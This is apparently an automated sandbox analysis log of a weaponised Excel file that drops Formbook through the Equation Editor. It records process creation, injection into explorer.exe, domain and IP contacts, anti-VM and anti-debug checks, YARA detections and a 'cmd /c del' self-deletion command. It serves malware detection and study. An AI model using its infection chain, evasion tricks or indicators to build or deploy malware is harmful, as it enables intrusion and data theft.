      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C6F3CF6_2_00C6F3CF
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C963DB6_2_00C963DB
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C773536_2_00C77353
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00CBA37B6_2_00CBA37B
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C723056_2_00C72305
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C814896_2_00C81489
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00CA54856_2_00CA5485
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00CAD47D6_2_00CAD47D
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C8C5F06_2_00C8C5F0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C7351F6_2_00C7351F
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C7E6C16_2_00C7E6C1
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C746806_2_00C74680
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00D126226_2_00D12622
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00CA57C36_2_00CA57C3
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00CF579A6_2_00CF579A
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C7C7BC6_2_00C7C7BC
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00D0F8EE6_2_00D0F8EE
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C7C85C6_2_00C7C85C
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C9286D6_2_00C9286D
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C869FE6_2_00C869FE
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00D1098E6_2_00D1098E
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_025912388_2_02591238
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024EE2E98_2_024EE2E9
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024F73538_2_024F7353
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0253A37B8_2_0253A37B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024F23058_2_024F2305
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024EF3CF8_2_024EF3CF
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_025163DB8_2_025163DB
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0250905A8_2_0250905A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024F30408_2_024F3040
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0251D0058_2_0251D005
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024EE0C68_2_024EE0C6
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_025926228_2_02592622
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024FE6C18_2_024FE6C1
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024F46808_2_024F4680
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_025257C38_2_025257C3
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0257579A8_2_0257579A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024FC7BC8_2_024FC7BC
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0252D47D8_2_0252D47D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_025254858_2_02525485
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_025014898_2_02501489
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024F351F8_2_024F351F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0250C5F08_2_0250C5F0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_025A3A838_2_025A3A83
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02517B008_2_02517B00
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0257DBDA8_2_0257DBDA
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024EFBD78_2_024EFBD7
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0259CBA48_2_0259CBA4
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024FC85C8_2_024FC85C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0251286D8_2_0251286D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0258F8EE8_2_0258F8EE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_025759558_2_02575955
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_025069FE8_2_025069FE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0259098E8_2_0259098E
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024F29B28_2_024F29B2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0250EE4C8_2_0250EE4C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02522E2F8_2_02522E2F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0251DF7C8_2_0251DF7C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02500F3F8_2_02500F3F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024FCD5B8_2_024FCD5B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02520D3B8_2_02520D3B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0258FDDD8_2_0258FDDD
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000BC75F8_2_000BC75F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000A8C5B8_2_000A8C5B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000A8C608_2_000A8C60
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000A2D878_2_000A2D87
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000A2D908_2_000A2D90
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000A2FB08_2_000A2FB0
      Source: Form BA.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: C:\Users\Public\vbc.exeCode function: String function: 00CDF970 appears 48 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00C6DF5C appears 72 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00CB373B appears 132 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00CB3F92 appears 63 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 024EE2A8 appears 38 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0255F970 appears 81 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 02533F92 appears 108 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0253373B appears 238 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 024EDF5C appears 112 times
      Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: pool[1].exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: vbc.exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: pool[1].exe.3.dr, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
      Source: vbc.exe.3.dr, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
      Source: 5.0.vbc.exe.270000.0.unpack, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
      Source: 6.2.vbc.exe.270000.0.unpack, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
      Source: 6.0.vbc.exe.270000.0.unpack, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
      Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@10/19@4/3
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Form BA.xlsxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDD82.tmpJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: Form BA.xlsxVirustotal: Detection: 31%
      Source: Form BA.xlsxReversingLabs: Detection: 30%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exeJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: Form BA.xlsxStatic file information: File size 1277440 > 1048576
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: wntdll.pdb source: vbc.exe, rundll32.exe
      Source: Binary string: rundll32.pdb source: vbc.exe, 00000006.00000002.2243369456.0000000000896000.00000004.00000020.sdmp
      Source: Form BA.xlsxInitial sample: OLE indicators vbamacros = False
      Source: Form BA.xlsxInitial sample: OLE indicators encrypted = True
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0027951F push 72060001h; retf 0016h6_2_00279525
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004199C4 push si; iretd 6_2_004199C8
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004151D2 push eax; retf 6_2_004151D3
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00419BB5 push ss; ret 6_2_00419BB6
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041B3B5 push eax; ret 6_2_0041B408
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041B46C push eax; ret 6_2_0041B472
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041B402 push eax; ret 6_2_0041B408
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041B40B push eax; ret 6_2_0041B472
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004155A9 push ss; iretd 6_2_004155AA
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041CECD pushad ; retf 6_2_0041CECF
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024EDFA1 push ecx; ret 8_2_024EDFB4
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B51D2 push eax; retf 8_2_000B51D3
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000BB3B5 push eax; ret 8_2_000BB408
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000BB40B push eax; ret 8_2_000BB472
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000BB402 push eax; ret 8_2_000BB408
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000BB46C push eax; ret 8_2_000BB472
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B55A9 push ss; iretd 8_2_000B55AA
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B99C4 push si; iretd 8_2_000B99C8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B9BB5 push ss; ret 8_2_000B9BB6
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000BCECD pushad ; retf 8_2_000BCECF
      Source: initial sampleStatic PE information: section name: .text entropy: 7.57808526391
      Source: initial sampleStatic PE information: section name: .text entropy: 7.57808526391
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

      Boot Survival:

      barindex
      Drops PE files to the user root directoryShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: Form BA.xlsxStream path 'EncryptedPackage' entropy: 7.99876353791 (max. 8.0)

      Malware Analysis System Evasion:

      barindex
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000000A85E4 second address: 00000000000A85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000000A897E second address: 00000000000A8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004088B0 rdtsc 6_2_004088B0
      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2992Thread sleep time: -360000s >= -30000sJump to behavior
      Source: C:\Users\Public\vbc.exe TID: 1764Thread sleep time: -51703s >= -30000sJump to behavior
      Source: C:\Users\Public\vbc.exe TID: 2320Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 51703Jump to behavior
      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: explorer.exe, 00000007.00000000.2208966407.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000007.00000000.2201672465.000000000842E000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: explorer.exe, 00000007.00000000.2194096339.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
      Source: vbc.exeBinary or memory string: DdUXhZQ[fUE6Ws]YTSk6WLInYD73f[o5QsEYYq{nV]8XY[8XVpEzfoQZd5M[]WMZ][<IgogJD}4pfy]3[3Y5]DL[]}Y4[3Y5]D75esU[\moJezE[TiU[]qET]m8Z\3QqeMU[]K<IgogJD|YJg4E[eyQ3[3Y5]DL6e3Q5\xDjfoUZd5<pfTU6\osp\SQ[]mopg|Y5XlY5Y843[wEjfoUZd5<pfTU6\osp\SQ[e|<pU843[wEjfoQ[YDL[]nopgyMKX3QZ
      Source: explorer.exe, 00000007.00000000.2194056529.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: explorer.exe, 00000007.00000000.2194056529.0000000004234000.00000004.00000001.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
      Source: explorer.exe, 00000007.00000000.2201672465.000000000842E000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.000
      Source: explorer.exe, 00000007.00000000.2208992815.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
      Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004088B0 rdtsc 6_2_004088B0
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00409B20 LdrLoadDll,6_2_00409B20
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C500EA mov eax, dword ptr fs:[00000030h]6_2_00C500EA
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C50080 mov ecx, dword ptr fs:[00000030h]6_2_00C50080
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C726F8 mov eax, dword ptr fs:[00000030h]6_2_00C726F8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024F26F8 mov eax, dword ptr fs:[00000030h]8_2_024F26F8
      Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeDomain query: www.pon.xyz
      Source: C:\Windows\explorer.exeNetwork Connect: 151.101.0.119 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.intoxickiss.com
      Injects a PE file into a foreign processesShow sources
      Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
